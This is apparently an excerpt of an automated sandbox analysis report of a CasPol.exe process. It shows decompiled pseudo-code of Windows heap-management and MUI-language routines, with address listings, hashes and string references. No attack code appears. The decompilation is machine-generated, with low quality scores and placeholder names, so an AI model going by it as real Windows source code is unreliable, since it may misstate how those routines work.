						_v16 = _t280;
					} else {
						_t275 = L013D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E013FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01401370(_v16, 0x1394e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E013FBB40(_t262,  &_v68, _t244);
								if(L013C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01401370(_t282, 0x1394e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E013FBB40(_t262,  &_v68, _t201);
							if(L013C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L013D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E013FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01401370(_t280, 0x1394e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E013FBB40(_t267,  &_v68, _t245);
							if(L013C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01401370(_t284, 0x1394e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E013FBB40(_t267,  &_v68, _t224);
						if(L013C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                        0x013c3d3c
                                                                        0x013c3d42
                                                                        0x013c3d44
                                                                        0x013c3d46
                                                                        0x013c3d49
                                                                        0x013c3d4c
                                                                        0x013c3d4f
                                                                        0x013c3d52
                                                                        0x013c3d55
                                                                        0x013c3d58
                                                                        0x013c3d5b
                                                                        0x013c3d5f
                                                                        0x013c3d61
                                                                        0x013c3d66
                                                                        0x01418213
                                                                        0x01418218
                                                                        0x013c4085
                                                                        0x013c4088
                                                                        0x013c408e
                                                                        0x013c4094
                                                                        0x013c409a
                                                                        0x013c40a0
                                                                        0x013c40a6
                                                                        0x013c40a9
                                                                        0x013c40af
                                                                        0x013c40b6
                                                                        0x013c40bd
                                                                        0x013c40bd
                                                                        0x013c3d83
                                                                        0x0141821f
                                                                        0x01418229
                                                                        0x01418238
                                                                        0x01418238
                                                                        0x0141823d
                                                                        0x0141823d
                                                                        0x013c3da0
                                                                        0x013c3daf
                                                                        0x013c3db5
                                                                        0x013c3dba
                                                                        0x013c3dba
                                                                        0x013c3dd4
                                                                        0x013c3e94
                                                                        0x013c3eab
                                                                        0x013c3f6d
                                                                        0x013c3f84
                                                                        0x013c406b
                                                                        0x013c406b
                                                                        0x013c406e
                                                                        0x013c406e
                                                                        0x013c4070
                                                                        0x013c4074
                                                                        0x01418351
                                                                        0x01418351
                                                                        0x013c407a
                                                                        0x013c407f
                                                                        0x0141835d
                                                                        0x01418370
                                                                        0x01418377
                                                                        0x01418379
                                                                        0x0141837c
                                                                        0x0141837c
                                                                        0x0141835d
                                                                        0x00000000
                                                                        0x013c407f
                                                                        0x013c3f8a
                                                                        0x013c3f8d
                                                                        0x013c3f90
                                                                        0x013c3f95
                                                                        0x0141830d
                                                                        0x0141830f
                                                                        0x013c3f9b
                                                                        0x013c3fac
                                                                        0x013c3fae
                                                                        0x013c3fb1
                                                                        0x013c3fb1
                                                                        0x013c3fb6
                                                                        0x01418317
                                                                        0x0141831a
                                                                        0x00000000
                                                                        0x013c3fbc
                                                                        0x013c3fc1
                                                                        0x013c3fc9
                                                                        0x013c3fd7
                                                                        0x013c3fda
                                                                        0x013c3fdd
                                                                        0x013c4021
                                                                        0x013c4021
                                                                        0x013c4029
                                                                        0x013c4030
                                                                        0x013c4044
                                                                        0x013c4046
                                                                        0x013c4046
                                                                        0x013c4044
                                                                        0x013c4049
                                                                        0x01418327
                                                                        0x01418334
                                                                        0x01418339
                                                                        0x0141833c
                                                                        0x013c404f
                                                                        0x013c404f
                                                                        0x013c404f
                                                                        0x013c4051
                                                                        0x013c4056
                                                                        0x013c4063
                                                                        0x013c4063
                                                                        0x013c4068
                                                                        0x00000000
                                                                        0x013c4068
                                                                        0x013c3fdf
                                                                        0x013c3fe2
                                                                        0x013c3fe4
                                                                        0x013c3fe7
                                                                        0x013c3fef
                                                                        0x013c4003
                                                                        0x013c4005
                                                                        0x013c4005
                                                                        0x013c400c
                                                                        0x013c4013
                                                                        0x013c4016
                                                                        0x013c4017
                                                                        0x013c401b
                                                                        0x013c401e
                                                                        0x00000000
                                                                        0x013c401e
                                                                        0x013c3fb6
                                                                        0x013c3eb1
                                                                        0x013c3eb4
                                                                        0x013c3eb7
                                                                        0x013c3ebc
                                                                        0x014182a9
                                                                        0x014182ab
                                                                        0x013c3ec2
                                                                        0x013c3ed3
                                                                        0x013c3ed5
                                                                        0x013c3ed8
                                                                        0x013c3ed8
                                                                        0x013c3edd
                                                                        0x014182b3
                                                                        0x014182b6
                                                                        0x00000000
                                                                        0x013c3ee3
                                                                        0x013c3ee8
                                                                        0x013c3eed
                                                                        0x013c3ef0
                                                                        0x013c3ef3
                                                                        0x013c3f02
                                                                        0x013c3f05
                                                                        0x013c3f08
                                                                        0x014182c0
                                                                        0x014182c3
                                                                        0x014182c5
                                                                        0x014182c8
                                                                        0x014182d0
                                                                        0x014182e4
                                                                        0x014182e6
                                                                        0x014182e6
                                                                        0x014182ed
                                                                        0x014182f4
                                                                        0x014182f7
                                                                        0x014182f8
                                                                        0x014182fc
                                                                        0x014182ff
                                                                        0x014182ff
                                                                        0x013c3f0e
                                                                        0x013c3f11
                                                                        0x013c3f16
                                                                        0x013c3f1d
                                                                        0x013c3f31
                                                                        0x01418307
                                                                        0x01418307
                                                                        0x013c3f31
                                                                        0x013c3f39
                                                                        0x013c3f48
                                                                        0x013c3f4d
                                                                        0x013c3f50
                                                                        0x013c3f50
                                                                        0x013c3f53
                                                                        0x013c3f58
                                                                        0x013c3f65
                                                                        0x013c3f65
                                                                        0x013c3f6a
                                                                        0x00000000
                                                                        0x013c3f6a
                                                                        0x013c3edd
                                                                        0x013c3dda
                                                                        0x013c3ddd
                                                                        0x013c3de0
                                                                        0x013c3de5
                                                                        0x01418245
                                                                        0x013c3deb
                                                                        0x013c3df7
                                                                        0x013c3dfc
                                                                        0x013c3dfe
                                                                        0x013c3e01
                                                                        0x013c3e01
                                                                        0x013c3e06
                                                                        0x0141824d
                                                                        0x0141824f
                                                                        0x01418254
                                                                        0x00000000
                                                                        0x013c3e0c
                                                                        0x013c3e11
                                                                        0x013c3e16
                                                                        0x013c3e19
                                                                        0x013c3e29
                                                                        0x013c3e2c
                                                                        0x013c3e2f
                                                                        0x0141825c
                                                                        0x0141825f
                                                                        0x01418261
                                                                        0x01418264
                                                                        0x0141826c
                                                                        0x01418280
                                                                        0x01418282
                                                                        0x01418282
                                                                        0x01418289
                                                                        0x01418290
                                                                        0x01418293
                                                                        0x01418294
                                                                        0x01418298
                                                                        0x0141829b
                                                                        0x0141829b
                                                                        0x013c3e35
                                                                        0x013c3e38
                                                                        0x013c3e3d
                                                                        0x013c3e44
                                                                        0x013c3e58
                                                                        0x014182a3
                                                                        0x014182a3
                                                                        0x013c3e58
                                                                        0x013c3e60
                                                                        0x013c3e6f
                                                                        0x013c3e74
                                                                        0x013c3e77
                                                                        0x013c3e77
                                                                        0x013c3e7a
                                                                        0x013c3e7f
                                                                        0x013c3e8c
                                                                        0x013c3e8c
                                                                        0x013c3e91
                                                                        0x00000000
                                                                        0x013c3e91

                                                                        Strings
                                                                        • WindowsExcludedProcs, xrefs: 013C3D6F
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 013C3D8C
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 013C3DC0
                                                                        • Kernel-MUI-Language-SKU, xrefs: 013C3F70
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 013C3E97
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: 556755c5bd2eea67af5010e2efa7f6d9cdab52eec11164535239daabad7d52b3
                                                                        • Instruction ID: 6c0078297ccae7bf674ecb7144b11400e888aea194efcf9b197e8611b7c126f2
                                                                        • Opcode Fuzzy Hash: 556755c5bd2eea67af5010e2efa7f6d9cdab52eec11164535239daabad7d52b3
                                                                        • Instruction Fuzzy Hash: 26F14E72D0021AEFDB12DF98C980EEFBBB9FF58A54F15406AE905A7250D7349E01CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E013B40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E013BB150(", passed to %s", _t29);
					}
					_push("\n");
					E013BB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x14a6378 = 1;
						asm("int3");
						 *0x14a6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                        0x013b40e6
                                                                        0x013b40e8
                                                                        0x013b40f1
                                                                        0x0141042d
                                                                        0x0141044c
                                                                        0x01410451
                                                                        0x0141042f
                                                                        0x01410444
                                                                        0x01410449
                                                                        0x0141045d
                                                                        0x01410466
                                                                        0x0141046e
                                                                        0x01410474
                                                                        0x01410475
                                                                        0x0141047a
                                                                        0x0141048a
                                                                        0x0141048c
                                                                        0x01410493
                                                                        0x01410494
                                                                        0x01410494
                                                                        0x00000000
                                                                        0x0141049b
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                        • API String ID: 0-188067316
                                                                        • Opcode ID: 210a7d9f9451cfac4c976eac90b749814c184287492acfe1dfab77c7d7eae38d
                                                                        • Instruction ID: e08c18edc036732c1bb5a1541a5c1fd32d663efef0f15f2fac0737e2e91bc7ec
                                                                        • Opcode Fuzzy Hash: 210a7d9f9451cfac4c976eac90b749814c184287492acfe1dfab77c7d7eae38d
                                                                        • Instruction Fuzzy Hash: E8014C721412419EE325976EE49EF92BBA8DB00B38F19803EF10547B55EEF89480C214
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DA830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E013DA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x14a8748 - 1;
					if( *0x14a8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
									_t260 = _t257 + 4;
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E013BB150();
								_t257 = _t260 + 4;
								__eflags =  *0x14a7bc8;
								if(__eflags == 0) {
									E01472073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0147A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0140D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E013DAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0147A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0147A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x14a8748 - 1;
					if( *0x14a8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E013BB150();
							__eflags =  *0x14a7bc8;
							if(__eflags == 0) {
								_t131 = E01472073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                        0x013da83a
                                                                        0x013da83c
                                                                        0x013da83e
                                                                        0x013da841
                                                                        0x013da844
                                                                        0x013da84a
                                                                        0x013daa53
                                                                        0x013daa59
                                                                        0x013daa59
                                                                        0x013da858
                                                                        0x013da85e
                                                                        0x013daaf5
                                                                        0x013daafc
                                                                        0x0142229e
                                                                        0x014222a2
                                                                        0x014222a8
                                                                        0x014222b3
                                                                        0x014222b5
                                                                        0x014222bb
                                                                        0x014222c1
                                                                        0x014222c5
                                                                        0x014222e6
                                                                        0x014222eb
                                                                        0x014222f0
                                                                        0x014222c7
                                                                        0x014222dc
                                                                        0x014222e1
                                                                        0x014222e1
                                                                        0x014222f3
                                                                        0x014222f8
                                                                        0x014222fd
                                                                        0x01422300
                                                                        0x01422307
                                                                        0x0142230e
                                                                        0x0142230e
                                                                        0x01422313
                                                                        0x01422313
                                                                        0x014222b5
                                                                        0x014222a2
                                                                        0x013daafc
                                                                        0x013da864
                                                                        0x013da869
                                                                        0x013daa5c
                                                                        0x013daa5e
                                                                        0x013da86f
                                                                        0x013da87f
                                                                        0x013da885
                                                                        0x013da885
                                                                        0x013da88b
                                                                        0x013da890
                                                                        0x013da896
                                                                        0x013dab0c
                                                                        0x013dab0f
                                                                        0x013dab15
                                                                        0x01422320
                                                                        0x01422320
                                                                        0x013dab1b
                                                                        0x013da89c
                                                                        0x013da89f
                                                                        0x013da8a2
                                                                        0x013da8a2
                                                                        0x013da8a5
                                                                        0x013da8af
                                                                        0x013da8b3
                                                                        0x013da8b8
                                                                        0x013daa66
                                                                        0x013da8be
                                                                        0x013da8c5
                                                                        0x013da8c6
                                                                        0x013da8ce
                                                                        0x01422328
                                                                        0x01422332
                                                                        0x01422337
                                                                        0x01422337
                                                                        0x013da8ce
                                                                        0x013da8d4
                                                                        0x013da8d8
                                                                        0x013da8db
                                                                        0x013da8de
                                                                        0x013da8e1
                                                                        0x013da8e5
                                                                        0x013da8e8
                                                                        0x013da8f0
                                                                        0x013da8f3
                                                                        0x0142234c
                                                                        0x01422350
                                                                        0x01422355
                                                                        0x01422359
                                                                        0x01422359
                                                                        0x013da8f9
                                                                        0x013da901
                                                                        0x013daae4
                                                                        0x013daae4
                                                                        0x013daaea
                                                                        0x00000000
                                                                        0x013da907
                                                                        0x013da90a
                                                                        0x013da91d
                                                                        0x013da91d
                                                                        0x00000000
                                                                        0x013da910
                                                                        0x013da910
                                                                        0x013da910
                                                                        0x013da914
                                                                        0x013da924
                                                                        0x013da924
                                                                        0x013da924
                                                                        0x013da924
                                                                        0x013da916
                                                                        0x013da91b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da91b
                                                                        0x013da925
                                                                        0x013da925
                                                                        0x013da932
                                                                        0x013da936
                                                                        0x013da93c
                                                                        0x013da93c
                                                                        0x013da93c
                                                                        0x013dab22
                                                                        0x013dab24
                                                                        0x013dab27
                                                                        0x013dab27
                                                                        0x013da942
                                                                        0x013da944
                                                                        0x013daaba
                                                                        0x013daabd
                                                                        0x013daac0
                                                                        0x013daac0
                                                                        0x013daac2
                                                                        0x013dab2f
                                                                        0x013daac4
                                                                        0x013daac4
                                                                        0x013daac7
                                                                        0x013daaca
                                                                        0x013daacc
                                                                        0x013daace
                                                                        0x013daace
                                                                        0x013daace
                                                                        0x013daad1
                                                                        0x013daad1
                                                                        0x013daad7
                                                                        0x013daad9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422361
                                                                        0x01422369
                                                                        0x0142236b
                                                                        0x00000000
                                                                        0x01422371
                                                                        0x00000000
                                                                        0x01422371
                                                                        0x00000000
                                                                        0x0142236b
                                                                        0x013daac0
                                                                        0x013da94a
                                                                        0x013da94a
                                                                        0x013da94d
                                                                        0x013da94d
                                                                        0x013da950
                                                                        0x013da954
                                                                        0x01422376
                                                                        0x01422380
                                                                        0x013da95a
                                                                        0x013da95a
                                                                        0x013da95c
                                                                        0x013da95f
                                                                        0x013da961
                                                                        0x013da961
                                                                        0x013da967
                                                                        0x013da96a
                                                                        0x013da972
                                                                        0x013daa02
                                                                        0x013daa06
                                                                        0x013daa10
                                                                        0x013daa16
                                                                        0x013daa16
                                                                        0x013daa1b
                                                                        0x013daa21
                                                                        0x013daa24
                                                                        0x013daa27
                                                                        0x013daa29
                                                                        0x013daa2c
                                                                        0x013daa32
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da978
                                                                        0x013da978
                                                                        0x013da97b
                                                                        0x013da981
                                                                        0x013da996
                                                                        0x013da998
                                                                        0x013da99f
                                                                        0x013da9a2
                                                                        0x0142238a
                                                                        0x013da9a8
                                                                        0x013da9a8
                                                                        0x013da9a8
                                                                        0x013da9aa
                                                                        0x013da9ad
                                                                        0x013da9b0
                                                                        0x013da9bb
                                                                        0x013da9be
                                                                        0x013da9c7
                                                                        0x013da9c9
                                                                        0x013da9c9
                                                                        0x013da9cc
                                                                        0x013da9d1
                                                                        0x013daa6d
                                                                        0x013daa70
                                                                        0x013daa73
                                                                        0x013daa75
                                                                        0x013daa79
                                                                        0x013daa7e
                                                                        0x013daa82
                                                                        0x013daa8f
                                                                        0x013daa94
                                                                        0x013daa96
                                                                        0x01422392
                                                                        0x014223a1
                                                                        0x014223a1
                                                                        0x013daa9c
                                                                        0x013daa9f
                                                                        0x013daaa2
                                                                        0x013daaa2
                                                                        0x013daaa8
                                                                        0x013daaab
                                                                        0x013daaaf
                                                                        0x00000000
                                                                        0x013daab5
                                                                        0x00000000
                                                                        0x013daab5
                                                                        0x013da9d7
                                                                        0x013da9d7
                                                                        0x013da9da
                                                                        0x013da9e0
                                                                        0x013da9e3
                                                                        0x013da9e6
                                                                        0x013da9e9
                                                                        0x013da9eb
                                                                        0x013da9fd
                                                                        0x013da9fd
                                                                        0x00000000
                                                                        0x013da9eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013da983
                                                                        0x013da983
                                                                        0x013da983
                                                                        0x013da987
                                                                        0x013da995
                                                                        0x013da995
                                                                        0x013da995
                                                                        0x013da995
                                                                        0x013da989
                                                                        0x013da98e
                                                                        0x00000000
                                                                        0x013da990
                                                                        0x00000000
                                                                        0x013da990
                                                                        0x013da98e
                                                                        0x00000000
                                                                        0x013da983
                                                                        0x013da972
                                                                        0x013da90a
                                                                        0x013daa34
                                                                        0x013daa34
                                                                        0x013daa40
